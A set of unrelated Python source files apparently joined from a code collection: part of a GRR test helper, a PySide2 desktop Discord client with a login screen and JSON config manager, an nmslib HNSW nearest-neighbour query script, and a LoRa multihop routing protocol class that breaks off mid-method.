shutil.rmtree(output_dir)
atexit.register(CleanUpInstaller)
p = _StartComponent(
"grr_response_client_builder.client_build",
_GetServerComponentArgs(server_config_path) +
_ComponentOptionsToArgs(component_options) +
["repack", "--template", template_path, "--output_dir", output_dir])
if p.wait() != 0:
raise RuntimeError("RunRepackTemplate execution failed.")
# Repacking may apparently generate more than one file. Just select the
# biggest one: it's guaranteed to be the template.
paths = [os.path.join(output_dir, fname) for fname in os.listdir(output_dir)]
sizes = [os.path.getsize(p) for p in paths]
_, biggest_path = max(zip(sizes, paths))
return biggest_path
def RunUploadExe(server_config_path: str,
exe_path: str,
platform_str: str,
component_options: Optional[ComponentOptions] = None) -> str:
"""Runs 'grr_config_upater upload_exe' to upload a binary to GRR."""
p = _StartComponent(
"grr_response_server.bin.config_updater",
_GetServerComponentArgs(server_config_path) +
_ComponentOptionsToArgs(component_options) + [
"upload_exe", "--file", exe_path, "--platform", platform_str,
"--upload_subdirectory", "test"
])
if p.wait() != 0:
raise RuntimeError("RunUploadExe execution failed.")
return "%s/test/%s" % (platform_str, os.path.basename(exe_path))
_PROCESS_CHECK_INTERVAL = 0.1
def _DieIfSubProcessDies(processes: Iterable[subprocess.Popen],
already_dead_event: threading.Event):
"""Synchronously waits for processes and dies if one dies."""
while True:
for p in processes:
if p.poll() not in [None, 0]:
# Prevent a double kill. When the main process exits, it kills the
# children. We don't want a child's death to cause a SIGTERM being
# sent to a process that's already exiting.
if already_dead_event.is_set():
return
# DieIfSubProcessDies runs in a background thread, raising an exception
# will just kill the thread while what we want is to fail the whole
# process.
print("Subprocess %s died unexpectedly. Killing main process..." %
p.pid)
for kp in processes:
try:
os.kill(kp.pid, signal.SIGTERM)
except OSError:
pass
# sys.exit only exits a thread when called from a thread.
# Killing self with SIGTERM to ensure the process runs necessary
# cleanups before exiting.
os.kill(os.getpid(), signal.SIGTERM)
time.sleep(_PROCESS_CHECK_INTERVAL)
def DieIfSubProcessDies(
processes: Iterable[subprocess.Popen]) -> threading.Thread:
"""Kills the process if any of given processes dies.
This function is supposed to run in a background thread and monitor provided
processes to ensure they don't die silently.
Args:
processes: An iterable with multiprocessing.Process instances.
Returns:
Background thread started to monitor the processes.
"""
already_dead_event = threading.Event()
t = threading.Thread(
target=_DieIfSubProcessDies, args=(processes, already_dead_event))
t.daemon = True
t.start()
def PreventDoubleDeath():
already_dead_event.set()
atexit.register(PreventDoubleDeath)
return t
def RunApiShellRawAccess(config: Text, exec_code: Text) -> None:
"""Runs exec_code in the API shell."""
p = _StartComponent(
"grr_response_server.bin."
"api_shell_raw_access",
["--config", config, "--exec_code", exec_code],
)
if p.wait() != 0:
raise Exception("api_shell_raw_access execution failed: {}".format(
p.returncode))
|
baddiscord.py
|
from PySide2.QtWidgets import QApplication, QWidget, QLabel, QVBoxLayout, QHBoxLayout,\
QPushButton, QLineEdit, QSizePolicy, QMessageBox, QStyle, QToolBar, QMenu, QWidgetAction
from PySide2.QtCore import Qt
from PySide2.QtGui import QIcon, QWindow, QPalette
from qasync import QEventLoop, QThreadExecutor
import threading
import discord
import asyncio
import aiohttp # Instead of requests in favour of asyncio ability
import time
import json
import uuid
import os
class IOManager: ## Manages reading and writing data to files.
def __init__(self, file, start=True, jtype=True, binary=False):
'''
file:
type, string
Path to file to iomanage
start:
-- OPTIONAL --
type, boolean
default, True
Start operations thread on creation
jtype:
-- OPTIONAL --
type, boolean
default, True
File is json database
binary:
-- OPTIONAL --
type, boolean
default, False
Open file in binary read/write mode
'''
self.Ops = [] # Operations
self.Out = {} # Outputs
self.Reserved = [] # Reserved keys for operations
self.stopthread = False # Should stop operations thread
self.stopped = True # Is operations thread stopped
self.thread = None # Operation thread object
self.file = file # File to read/write
## Assigning open params to class
if binary: # Can not be json type and binary read/write
self.jtype = False
else:
self.jtype = jtype
self.binary = binary
# Create file if it doesn't already exist
if not os.path.isfile(file):
with open(file, "w+") as file:
if jtype:
file.write("{}")
if start: # start if kwarg start is True
self.Start()
def GetId(self): # Class to get a probably unique key
return uuid.uuid4()
def Read(self, waitforwrite=False, id=None): # Handles creating read operations
'''
waitforwrite:
-- OPTIONAL --
type, boolean
default, False
Operations thread should wait for write process same id kwarg
Requires id kwarg to be set
id:
-- OPTIONAL --
type, uuid4
default, None
ID to identify this operation
'''
if not waitforwrite:
if id == None: id = uuid.uuid4() # get uuid if none passed
self.Ops.append({"type": "r", "wfw": False, "id": id}) # Add operation to list
else: # Wait for next write with same id
if id == None: # waitforwrite requires id
return None
# Check for duplicate ids
for x in self.Ops:
if x["id"] == id:
return None
if id in self.Reserved:
return None
# Reserve id
# Add operation to list
self.Reserved.append(id)
self.Ops.append({"type": "r", "wfw": True, "id": id})
while not id in self.Out: # Wait for read operation to complete
time.sleep(.01)
result = self.Out[id] # Get results
del self.Out[id] # Delete results from output
return result["data"] # return results
def Write(self, nd, id=None):
'''
nd:
type, string/bytes
New data to write to file
id:
-- OPTIONAL --
type, uuid
default, None
ID to identify this operation
'''
self.Ops.append({"type": "w", "d": nd, "id": id}) # Add write operation to list
def Start(self): # Start operations thread
if self.stopped: # Start only if thread not running
self.stopthread = False # Reset stopthread to avoid immediate stoppage
# Create thread and start
self.thread = threading.Thread(target=self.ThreadFunc)
self.thread.start()
def Stop(self): # Stop operations thread
if not self.stopthread: # Stop thread only if not already stopping
if not self.stopped: # Stop thread only if thread running
self.stopthread = True
def isStopped(self): # Test if operations thread not running
return self.stopped
def ThreadFunc(self): # Operations function
self.stopped = False # Reset stopped attr
# Read/write type, binary or not
t = None
if self.binary:
t = "b"
else:
t = ""
# Main loop
while not self.stopthread: # Test for stop attr
if len(self.Ops) > 0: # Test for new operations
# Get next operation
Next = self.Ops[0]
del self.Ops[0]
# Open file as 'type' (read/write) + t (binary/text)
with open(self.file, Next["type"]+t) as file:
id = Next["id"] # Operation ID
if Next["type"] == "r": # If is read operation
# Use json.load if in json mode
if self.jtype:
d = json.load(file)
else:
d = file.read()
# Put data in output
self.Out[id] = {"data": d, "id": id}
if Next["wfw"]: # Test if read operation is wait-for-write
# Wait for write loop
while not self.stopthread: # Test for stop attr
# Search for write operation with same id
op = None
for op in self.Ops:
if op["id"] == id:
break
# If no write operation, wait and restart loop
if op == None:
time.sleep(.1)
continue
self.Reserved.remove(id) # Remove reserved id
self.Ops.remove(op) # Remove write operation from list
self.Ops.insert(0, op) # Place write operation first
break # Break wfw loop
continue # Continue to main loop start
elif Next["type"] == "w": # If is write operation
# Use json.dump if in json mode
if self.jtype:
json.dump(Next["d"], file, indent=4)
else:
file.write(Next["d"])
else: # If no operations, wait.
time.sleep(.1)
self.stopped = True # Set operation thread as stopped
class LoginMenu(QWidget):
def switcher(self, nw):
self.cwidget.hide()
self.cwidget = nw
nw.show()
async def loginUserDetails(self, e, p):
self.setEnabled(False)
t = await c.getUserToken(e, p)
if t != None:
await self.loginToken(t, False)
else:
self.setEnabled(True)
async def loginToken(self, t, b):
self.setEnabled(False)
try:
await c.login(t, bot=b)
try:
id = io.GetId()
d = io.Read(True, id)
d["LoginDetails"]["Token"] = t
d["LoginDetails"]["BotUser"] = b
io.Write(d, id)
await discord.Client.connect(c)
except Exception as e:
c.Popup(str(e))
self.setEnabled(True)
except discord.errors.LoginFailure as e:
c.Popup("Token is incorrect.")
self.setEnabled(True)
except discord.errors.HTTPException as e:
c.Popup(str(e))
self.setEnabled(True)
def setupUserLogin(self):
ul = QWidget()
ull = QVBoxLayout()
ul.setLayout(ull)
## Back button
bbw = QWidget()
bbwl = QHBoxLayout()
bbw.setLayout(bbwl)
bb = QPushButton("<- Go Back")
bb.setStyleSheet("background-color: #ffffff;")
spacer = QWidget()
bbwl.addWidget(bb)
bbwl.addWidget(spacer)
bbwl.setStretchFactor(spacer, 5)
bb.clicked.connect(lambda: self.switcher(self.mm))
bb.clicked.connect(lambda: c.setFixedSize(450, 150))
ull.addWidget(bbw)
## Detail Fields
ew = QWidget()
pw = QWidget()
ewl = QHBoxLayout()
pwl = QHBoxLayout()
ew.setLayout(ewl)
pw.setLayout(pwl)
ewl.addWidget(QLabel("Email"))
pwl.addWidget(QLabel("Password"))
email = QLineEdit()
email.setStyleSheet("background-color: #ffffff;")
passw = QLineEdit()
passw.setEchoMode(QLineEdit.Password)
passw.returnPressed.connect(lambda: loop.create_task(self.loginUserDetails(email.text(), passw.text())))
passw.setStyleSheet("background-color: #ffffff;")
dlb = QPushButton("Login")
dlb.setStyleSheet("background-color: #ffffff;")
dlb.clicked.connect(lambda: loop.create_task(self.loginUserDetails(email.text(), passw.text())))
ewl.addWidget(email)
pwl.addWidget(passw)
ull.addWidget(ew)
ull.addWidget(pw)
ull.addWidget(dlb)
## Seperator
ull.addWidget(QLabel("_______________________________________________________________________"))
## Token Login
tw = QWidget()
twl = QHBoxLayout()
tw.setLayout(twl)
token = QLineEdit()
token.returnPressed.connect(lambda: loop.create_task(self.loginToken(token.text(), False)))
token.setStyleSheet("background-color: #ffffff;")
tlb = QPushButton("Login")
tlb.setStyleSheet("background-color: #ffffff;")
tlb.clicked.connect(lambda: loop.create_task(self.loginToken(token.text(), False)))
twl.addWidget(QLabel("Token"))
twl.addWidget(token)
ull.addWidget(tw)
ull.addWidget(tlb)
# Align everything to top
squish = QWidget()
ull.addWidget(squish)
ull.setStretchFactor(squish, 100)
return ul
def setupBotLogin(self):
bl = QWidget()
bll = QVBoxLayout()
bl.setLayout(bll)
## Back button
bbw = QWidget()
bbwl = QHBoxLayout()
bbw.setLayout(bbwl)
bb = QPushButton("<- Go Back")
bb.setStyleSheet("background-color: #ffffff;")
spacer = QWidget()
bbwl.addWidget(bb)
bbwl.addWidget(spacer)
bbwl.setStretchFactor(spacer, 5)
bb.clicked.connect(lambda: self.switcher(self.mm))
bb.clicked.connect(lambda: c.setFixedSize(450, 150))
bll.addWidget(bbw)
## Token Login
tw = QWidget()
twl = QHBoxLayout()
tw.setLayout(twl)
token = QLineEdit()
token.returnPressed.connect(lambda: loop.create_task(self.loginToken(token.text(), True)))
token.setStyleSheet("background-color: #ffffff;")
tlb = QPushButton("Login")
tlb.setStyleSheet("background-color: #ffffff;")
tlb.clicked.connect(lambda: loop.create_task(self.loginToken(token.text(), True)))
twl.addWidget(QLabel("Token"))
twl.addWidget(token)
bll.addWidget(tw)
bll.addWidget(tlb)
# Align everything to top
squish = QWidget()
bll.addWidget(squish)
bll.setStretchFactor(squish, 5)
return bl
def __init__(self):
super().__init__()
l = QVBoxLayout()
self.setLayout(l)
title = QLabel("Login to BadDiscord")
title.setAlignment(Qt.AlignHCenter)
title.setStyleSheet("font: 18pt;")
l.addWidget(title)
self.mm = QWidget()
mml = QVBoxLayout()
self.mm.setLayout(mml)
ul = self.setupUserLogin()
bl = self.setupBotLogin()
ulb = QPushButton("Login as User")
blb = QPushButton("Login as Bot")
mml.addWidget(ulb)
ulb.setStyleSheet("background-color: #ffffff;")
blb.setStyleSheet("background-color: #ffffff;")
mml.addWidget(blb)
l.addWidget(ul)
l.addWidget(bl)
l.addWidget(self.mm)
ul.hide()
bl.hide()
self.cwidget = self.mm
ulb.clicked.connect(lambda: self.switcher(ul))
ulb.clicked.connect(lambda: c.setFixedSize(450, 350))
blb.clicked.connect(lambda: self.switcher(bl))
blb.clicked.connect(lambda: c.setFixedSize(450, 220))
# Align everything to top
squish = QWidget()
l.addWidget(squish)
l.setStretchFactor(squish, 5)
self.show()
class MainApp(QWidget):
def ScreenChanged(self, screen):
self.client.setMaximumSize(screen.size())
def addServerAction(self, text, function, args=[], kwargs={}):
action = QWidgetAction(self)
aButton = QPushButton(text)
aButton.clicked.connect(lambda: function(*args, **kwargs))
action.setDefaultWidget(aButton)
self.ServerActions.addAction(action)
def setupTopBar(self):
tb = QWidget()
tbl = QHBoxLayout()
tb.setLayout(tbl)
tb.setStyleSheet("border: 3px solid black; background-color: #7289da;")
tbl.setAlignment(Qt.AlignLeft)
homeBtn = QPushButton()
homeBtn.setIcon(self.client.ico)
saTB = QToolBar()
self.ServerActions = QMenu()
self.ServerActions.setTitle("⠀ Home ⠀")
saTB.addAction(self.ServerActions.menuAction())
tbl.addWidget(homeBtn)
tbl.addWidget(saTB)
saTB.setStyleSheet("border: 1px solid black;")
homeBtn.setStyleSheet("border: none;")
self.ServerActions.setStyleSheet("border: none;")
return tb
def __init__(self, parent):
super().__init__()
self.client = parent
parent.maw = self
parent.l.addWidget(self)
l = QVBoxLayout()
self.setLayout(l)
l.setAlignment(Qt.AlignTop)
tb = self.setupTopBar()
l.addWidget(tb)
parent.setMinimumSize(parent.size())
parent.setMaximumSize(parent.screen().size())
parent.screenChanged.connect(self.ScreenChanged)
parent.hide()
parent.setWindowFlag(Qt.CustomizeWindowHint)
parent.setWindowFlag(Qt.WindowMaximizeButtonHint)
parent.show()
self.show()
class Client(QWidget, QWindow, discord.Client):
def __init__(self):
QWidget.__init__(self)
QWindow.__init__(self)
discord.Client.__init__(self)
self.maw = None
self.ico = QIcon()
self.ico.addFile("./Assets/logo.jpg")
async def on_ready(self):
print("Logged in as " + self.user.name)
self.lm.hide()
del self.lm
self.setWindowTitle("BadDiscord -- " + self.user.name + " -- Bot User"\
if self.user.bot else "BadDiscord -- " + self.user.name)
self.setStyleSheet("background-color: #2c2f33;")
MainApp(self)
def Popup(self, text):
l = QMessageBox()
l.setText(text)
l.setWindowTitle("Login Failed")
l.setIcon(QMessageBox.Warning)
l.setWindowIcon(self.style().standardIcon(getattr(QStyle, "SP_MessageBoxWarning")))
l.show()
self.temp = l
async def getMFAToken(self, ticket, code):
if code == "":
self.Popup("Please enter your two-factor code.")
return None
payload = {
"code": code,
"gift_code_sku_id": None,
"login_source": None,
"ticket": ticket
}
async with self.bses.post("https://discordapp.com/api/v7/auth/mfa/totp", json=payload) as r:
r = await r.json()
if "token" not in r:
self.Popup(r["message"])
else:
return r["token"]
return None
async def loginWithMFAToken(self, w, code, ticket):
w.setEnabled(False)
token = await self.getMFAToken(ticket, code.text())
if token == None:
w.setEnabled(True)
else:
w.hide()
del w
await self.lm.loginToken(token, False)
async def mfaKeyGrab(self, ticket):
w = QWidget()
l = QVBoxLayout()
w.setLayout(l)
label = QLabel("Enter your Two-Factor Auth Code")
label.setStyleSheet("font: 15pt;")
code = QLineEdit()
code.setStyleSheet("background-color: #ffffff;")
lb = QPushButton("Login")
lb.setStyleSheet("background-color: #ffffff;")
l.addWidget(label)
l.addWidget(code)
l.addWidget(lb)
lb.clicked.connect(lambda: loop.create_task(self.loginWithMFAToken(w, code, ticket)))
w.show()
w.setFixedSize(w.size())
w.setWindowTitle("BadDiscord -- Two-Factor Verification")
w.setWindowIcon(self.ico)
w.setStyleSheet("background-color: #7289da;")
async def getUserToken(self, e, p):
payload = {
'email': e,
'password': p
}
async with self.bses.post('https://discordapp.com/api/v7/auth/login', json=payload) as r:
r = await r.json()
#await session.close()
if "token" in r and not "mfa" in r and not r["token"] == None:
return r["token"]
elif "errors" in r:
pt = ""
for key in r["errors"]:
if pt != "": pt += "\n"
pt += key.capitalize() + ": " + r["errors"][key]["_errors"][0]["message"] + "."
self.Popup(pt)
elif "captcha_key" in r:
self.Popup("Account with that email does not exist.")
else:
await self.mfaKeyGrab(r["ticket"])
return None
async def startClient(self):
self.bses = aiohttp.ClientSession(
loop=asyncio.get_event_loop(),
timeout=aiohttp.ClientTimeout(total=1)
)
self.l = QVBoxLayout()
self.setLayout(self.l)
self.lm = LoginMenu()
self.l.addWidget(self.lm)
self.l.setMargin(0)
self.setFixedSize(450, 150)
self.setWindowTitle("BadDiscord -- Login")
self.setWindowIcon(self.ico)
self.setStyleSheet("background-color: #7289da;")
self.show()
if __name__ == "__main__":
app = QApplication()
loop = QEventLoop(app)
asyncio.set_event_loop(loop)
c = Client()
io = IOManager("configs.json")
if io.Read() == {}:
# Write defaults to configs
io.Write({
"LoginDetails": {
"Token": None,
"BotUser": False,
}
})
# So we don't have to ensure loop is always running,
# Create task and run forever
with loop:
loop.create_task(c.startClient())
loop.run_forever()
io.Stop()
|
test_hnsw.py
|
import numpy
import sys
import nmslib
import time
import math
from multiprocessing import Process
def write_knn_out(out_dir,write_dist,num_inst,nbrs,batch_no,metric_space):
with open('%s/%d'%(out_dir,batch_no),'w') as fp:
fp.write('%d %d\n'%(len(nbrs),num_inst))
if write_dist == 1:
for j in range(0,len(nbrs)):
temp = {}
flag = 0
for k in range(0,len(nbrs[j][0])):
if metric_space == 'l2':
temp[nbrs[j][0][k]] = nbrs[j][1][k]
else:
temp[nbrs[j][0][k]] = 1-nbrs[j][1][k]
for t in sorted(temp):
if flag ==0:
fp.write('%d:%f'%(t,temp[t]))
flag = 1
else:
fp.write(' %d:%f'%(t,temp[t]))
fp.write('\n')
else:
for j in range(0,len(nbrs)):
temp = {}
flag = 0
for k in range(0,len(nbrs[j][0])):
temp[nbrs[j][0][k]] = 1
for t in sorted(temp):
if flag ==0:
fp.write('%d'%(t))
flag = 1
else:
fp.write(' %d'%(t))
fp.write('\n')
tst_ft_file = sys.argv[1]
model_file = sys.argv[2]
num_ft = int(sys.argv[3])
num_lbls = int(sys.argv[4])
efS = int(sys.argv[5])
num_nbrs = int(sys.argv[6])
write_dist = int(sys.argv[7])
out_dir = sys.argv[8]
num_thread = int(sys.argv[9])
num_out_threads = int(sys.argv[10])
metric_space = sys.argv[11]
index = nmslib.init(method='hnsw', space=metric_space)
nmslib.loadIndex(index,model_file)
index.setQueryTimeParams({'efSearch': efS, 'algoType': 'old'})
start = time.time()
fp = open(tst_ft_file,'rb')
fp.seek(8)
query = numpy.fromfile(fp,dtype=numpy.float32,count=-1,sep='')
query = numpy.reshape(query,(int(len(query)/num_ft),num_ft))
fp.close()
end = time.time()
start = time.time()
nbrs = index.knnQueryBatch(query, k=num_nbrs, num_threads = num_thread)
end = time.time()
print('Time taken to find approx nearest neighbors = %f'%(end-start))
batch_size = int(math.ceil(float(len(nbrs))/float(num_out_threads)))
for i in range(num_out_threads):
Process(target=write_knn_out, args=(out_dir,write_dist,num_lbls,nbrs[i*batch_size:min((i+1)*batch_size,len(nbrs))],i,metric_space)).start()
|
protocol.py
|
import base64
import logging
import random
import signal
import threading
import time
import traceback
from queue import Queue
from contextlib import contextmanager
from lora_multihop import ipc, serial_connection, header, variables
from lora_multihop.header import RegistrationHeader, ConnectRequestHeader, DisconnectRequestHeader
from lora_multihop.routing_table import RoutingTable
__author__ = "Marvin Rausch"
class Protocol:
PROCESS_INCOMING_MESSAGES = True
VERIFICATION_TIMEOUT = 25
PAUSE_PROCESSING_INCOMING_MESSAGES = False
MESSAGES_ACKNOWLEDGMENT = []
def __init__(self):
logging.info('created protocol obj: {}'.format(str(self)))
self.routing_table = RoutingTable()
self.received_messages_queue = Queue()
self.sending_messages_queue = Queue()
self.sending_queue = Queue()
self.connected_node = None
self.message_counter = 0
self.received_own_registration_message = False
def start_protocol_thread(self):
"""
starts new thread which processes incoming messages in background
"""
receiving_thread = threading.Thread(target=self.process_incoming_message)
receiving_thread.start()
def send_header(self, header_str):
"""
sends a string to LoRa network
@param header_str: message to send
"""
wait_random_time()
serial_connection.writing_q.put(('AT+SEND={}'.format(str(len(header_str))), ['AT,OK']))
if serial_connection.status_q.get(timeout=self.VERIFICATION_TIMEOUT):
serial_connection.writing_q.put((header_str, ['AT,SENDING', 'AT,SENDED']))
if serial_connection.status_q.get(timeout=self.VERIFICATION_TIMEOUT):
logging.debug("sent header '{}'.".format(header_str))
return
logging.debug("could not send header '{}', because got invalid status from lora module".format(header_str))
def process_incoming_message(self):
"""
get messages from LoRa module, create header object and call appropriate method to process the received message
"""
while self.PROCESS_INCOMING_MESSAGES:
if not serial_connection.response_q.empty() and not self.PAUSE_PROCESSING_INCOMING_MESSAGES:
raw_message = serial_connection.response_q.get()
logging.debug(f'process: {raw_message}')
try:
header_obj = header.create_header_obj_from_raw_message(raw_message)
if header_obj.ttl > 1:
self.routing_table.add_neighbor_to_routing_table(header_obj)
if header_obj.flag == header.RouteRequestHeader.HEADER_TYPE:
self.process_route_request(header_obj)
elif header_obj.flag == header.MessageHeader.HEADER_TYPE:
self.process_message_header(header_obj)
elif header_obj.flag == header.RouteReplyHeader.HEADER_TYPE:
self.process_route_reply_header(header_obj)
elif header_obj.flag == header.RouteErrorHeader.HEADER_TYPE:
self.process_route_error_header(header_obj)
elif header_obj.flag == header.MessageAcknowledgeHeader.HEADER_TYPE:
self.process_ack_header(header_obj)
elif header_obj.flag == header.RegistrationHeader.HEADER_TYPE:
self.process_registration_header(header_obj)
elif header_obj.flag == header.ConnectRequestHeader.HEADER_TYPE:
self.process_connect_request_header(header_obj)
elif header_obj.flag == header.DisconnectRequestHeader.HEADER_TYPE:
self.process_disconnect_request_header(header_obj)
except ValueError as e:
logging.warning(str(e))
traceback.print_exc()
try:
logging.debug('try to add received signal to unsupported devices list...')
addr = header.get_received_from_value(raw_message)
self.routing_table.add_neighbor_with_unsupported_protocol(addr)
except ValueError as e:
logging.warning(str(e))
def send_message(self, payload):
"""
send message to currently connected peer
@param payload: message to send as bytes
"""
if self.connected_node is not None:
destination = self.connected_node
best_route = self.routing_table.get_best_route_for_destination(destination)
if len(best_route) == 0:
logging.info('could not find a route to {}. Sending route request...'.format(destination))
if self.send_route_request_message(destination):
best_route = self.routing_table.get_best_route_for_destination(destination)
else:
logging.info('Got no answer on route requested.'.format(destination))
return
self.message_counter += 1
header_obj = header.MessageHeader(None, variables.MY_ADDRESS, variables.DEFAULT_TTL, destination,
best_route['next_node'], self.message_counter,
base64.b64encode(payload).decode(variables.ENCODING))
attempt = 0
self.add_message_to_waiting_acknowledgement_list(header_obj)
message_confirmed = False
while attempt < 3 and not message_confirmed:
logging.debug(f'attempt: {attempt}')
self.send_header(header_obj.get_header_str())
attempt_count_received_ack = 0
while attempt_count_received_ack < 10:
if header_obj.message_id not in self.MESSAGES_ACKNOWLEDGMENT:
message_confirmed = True
break
else:
time.sleep(0.5)
attempt_count_received_ack += 1
if message_confirmed:
break
else:
attempt += 1
if message_confirmed:
print('*******************message was acknowledged by receiver*******************')
else:
logging.debug(
f'message was not acknowledged by receiver. Current ack_list: {self.MESSAGES_ACKNOWLEDGMENT}'
f'\nSending route error message')
self.routing_table.delete_all_entries_of_destination(destination)
self.delete_from_ack_list(header_obj.message_id)
self.send_header(header.RouteErrorHeader(None, variables.MY_ADDRESS, variables.DEFAULT_TTL,
header_obj.destination).get_header_str())
def send_route_request_message(self, end_node):
"""
sends route request
@param end_node: node for which a route is required
@return: True, if route request was confirmed, else False
"""
route_request_header_obj = header.RouteRequestHeader(None, variables.MY_ADDRESS, variables.DEFAULT_TTL, 0,
end_node)
attempt = 0
message_confirmed = False
while attempt < 3 and not message_confirmed:
logging.debug('attempt: {}'.format(attempt))
self.send_header(route_request_header_obj.get_header_str())
check_request_attempt_count = 0
while check_request_attempt_count < 10:
if len(self.routing_table.get_best_route_for_destination(end_node)) != 0:
logging.debug('new route for {} found'.format(end_node))
message_confirmed = True
break
else:
time.sleep(0.5)
check_request_attempt_count += 1
attempt += 1
if message_confirmed:
return message_confirmed
else:
attempt += 1
return message_confirmed
def process_route_request(self, header_obj):
"""
processes received route request header
@param header_obj: route request header object
"""
# first of all check whether source of route request is myself (to prevent cycle)
if header_obj.source != variables.MY_ADDRESS:
# look whether requested node is myself
if header_obj.end_node == variables.MY_ADDRESS:
logging.debug('add new routing table entry before sending route reply')
self.routing_table.add_routing_table_entry(header_obj.source, header_obj.received_from,
header_obj.hops + 1)
logging.info('sending route reply message...')
self.send_route_reply(next_node=header_obj.received_from, end_node=header_obj.source)
else:
if len(self.routing_table.get_best_route_for_destination(header_obj.source)) == 0:
# if there is no entry for source of route request, you can add routing table entry
self.routing_table.add_routing_table_entry(header_obj.source, header_obj.received_from,
header_obj.hops)
header_obj.ttl = header_obj.ttl - 1
header_obj.hops = header_obj.hops + 1
if not self.routing_table.check_route_request_already_processed(header_obj.end_node):
logging.debug('forward route request message')
self.routing_table.add_address_to_processed_requests_list(header_obj.end_node)
self.send_header(header_obj.get_header_str())
else:
logging.debug('route request was already processed')
def send_route_reply(self, next_node, end_node):
"""
sends route reply message
@param next_node: next receiver of the message, which should forward the message to the destination node
@param end_node: node which sent the route request
"""
route_reply_header_obj = header.RouteReplyHeader(None, variables.MY_ADDRESS, variables.DEFAULT_TTL, 0, end_node,
next_node)
self.send_header(route_reply_header_obj.get_header_str())
def process_message_header(self, header_obj):
"""
processed received message header; if the end node of the message is this node the message will be put
into the received_messages queue to forward the message via IPC to the Java side; else the message will be
forwarded to the next_node
@param header_obj: message header object
"""
if header_obj.destination == variables.MY_ADDRESS and header_obj.source == self.connected_node:
ack_header_str = header.MessageAcknowledgeHeader(None, variables.MY_ADDRESS, variables.TTL_START_VALUE,
header_obj.source, header_obj.message_id).get_header_str()
if self.routing_table.check_message_already_received(header_obj.source, header_obj.message_id):
self.send_header(ack_header_str)
else:
logging.debug(f'payload: {str(header_obj.payload)}')
self.received_messages_queue.put(base64.b64decode(header_obj.payload))
# send acknowledge message
logging.debug('sending acknowledgement')
self.send_header(ack_header_str)
elif header_obj.next_node == variables.MY_ADDRESS and header_obj.destination != variables.MY_ADDRESS:
best_route = self.routing_table.get_best_route_for_destination(header_obj.destination)
if len(best_route) == 0:
logging.info('no routing table entry for {} to forward message found'.format(header_obj.next_node))
else:
header_obj.next_node = best_route['next_node']
logging.info('forwarding message from {source} to {destination} over hop {next_node}'.format(
source=header_obj.source, destination=header_obj.destination, next_node=header_obj.next_node))
header_obj.ttl = header_obj.ttl - 1
self.send_header(header_obj.get_header_str())
else:
logging.debug('ignoring message: {}'.format(str(header_obj)))
def process_route_reply_header(self, header_obj):
"""
processes route reply header; if the source address is equal to the own address the message will be rejected;
if the destination address is equal to the own address a new route will be added to the routing table, else
the message will be forwarded to the address mentioned in the next_node field
@param header_obj: route reply header object
"""
if header_obj.source == variables.MY_ADDRESS:
return
if header_obj.end_node == variables.MY_ADDRESS:
# add entry to routing table
self.routing_table.add_routing_table_entry(header_obj.source, header_obj.received_from, header_obj.hops + 1)
elif header_obj.next_node == variables.MY_ADDRESS:
if len(self.routing_table.get_best_route_for_destination(header_obj.source)) != 0:
# forward route reply message
# add routing table entry
logging.debug("add routing table entry before forwarding route reply message")
self.routing_table.add_routing_table_entry(header_obj.source, header_obj.received_from,
header_obj.hops + 1)
# forward message
header_obj.next_node = self.routing_table.get_best_route_for_destination(header_obj.end_node)[
'next_node']
header_obj.hops = header_obj.hops + 1
header_obj.ttl = header_obj.ttl - 1
self.send_header(header_obj.get_header_str())
def process_route_error_header(self, header_obj):
"""
processes route error header; node will be deleted from routing table
@param header_obj: route error header object
"""
if header_obj.broken_node in self.routing_table.get_list_of_all_available_destinations():
logging.debug(f'received route error. Remove {header_obj.broken_node} from routing table')
self.routing_table.delete_all_entries_of_destination(header_obj.broken_node)
else:
logging.debug(
f'broken node is not in available nodes: {self.routing_table.get_list_of_all_available_destinations()}')
header_obj.ttl -= 1
self.send_header(header_obj.get_header_str())
def process_ack_header(self, header_obj):
"""
processes message acknowledgement header; if the destination address is equal to the own address the header
object will be added to the message_acknowledgement_list, else the message will be forwarded
@param header_obj: message acknowledgement header object
"""
if header_obj.destination == variables.MY_ADDRESS:
self.delete_from_ack_list(header_obj.message_id)
header_obj.ttl -= 1
logging.debug('forward ack message')
if header_obj.destination != variables.MY_ADDRESS:
self.send_header(header_obj.get_header_str())
else:
logging.debug(f'do not forward ack message, because end node was my address')
def process_registration_header(self, header_obj):
"""
processes registration message header
:param header_obj: object of class RegistrationMessageHeader
"""
if header_obj.source != variables.MY_ADDRESS:
header_obj.ttl -= 1
self.routing_table.add_address_to_processed_registration_messages_list(header_obj.source)
if header_obj.subscribe:
logging.debug('registered new peer')
self.routing_table.add_peer(header_obj.peer_id, header_obj.source)
else:
logging.debug('unregistered peer')
self.routing_table.delete_peer(header_obj.peer_id, header_obj.source)
logging.debug('forward registration message')
self.send_header(header_obj.get_header_str())
else:
self.received_own_registration_message = True
def process_connect_request_header(self, header_obj):
"""
processes connect request header
:param header_obj: object of class ConnectRequestHeader
"""
if header_obj.received_from != variables.MY_ADDRESS:
if header_obj.end_node == variables.MY_ADDRESS:
self.connected_node = header_obj.source
# send connect request to java side
logging.debug("send connect request to java side")
self.sending_queue.put(
ipc.create_connect_request_message(header_obj.source_peer_id, header_obj.target_peer_id,
header_obj.timeout))
elif header_obj.next_node == variables.MY_ADDRESS:
logging.debug('forward connect request header')
route = self.routing_table.get_best_route_for_destination(header_obj.end_node)
if len(route) > 0:
header_obj.next_node = route['next_node']
header_obj.ttl -= 1
self.send_header(header_obj.get_header_str())
else:
logging.debug(f'could not forward connect request header, because there is no routing table entry '
f'for destination address {header_obj.end_node}')
def process_disconnect_request_header(self, header_obj):
"""
processes disconnect request header
:param header_obj: object of class DisconnectRequestHeader
"""
if header_obj.received_from != variables.MY_ADDRESS:
if header_obj.end_node == variables.MY_ADDRESS:
self.connected_node = header_obj.source
# send connect request to java side
logging.debug("send disconnect request to java side")
self.sending_queue.put(
ipc.create_disconnect_request_message(header_obj.source_peer_id, header_obj.target_peer_id))
elif header_obj.next_node == variables.MY_ADDRESS:
logging.debug('forward disconnect request header')
route = self.routing_table.get_best_route_for_destination(header_obj.end_node)
if len(route) > 0:
header_obj.next_node = route['next_node']
header_obj.ttl -= 1
self.send_header(header_obj.get_header_str())
else:
logging.debug(f'could not forward connect request header, because there is no routing table entry '
f'for destination address {header_obj.end_node}')
def send_connect_request_header(self, source_peer_id, target_peer_id, timeout_in_sec):
"""
sends connect request
:param source_peer_id: peer id of source peer
:param target_peer_id: peer id of target peer
:param timeout_in_sec: timeout in seconds
"""
# look for address of source peer id and check whether source peer is already registered
# wait until timeout for ConnectRequestHeader of other HubConnector
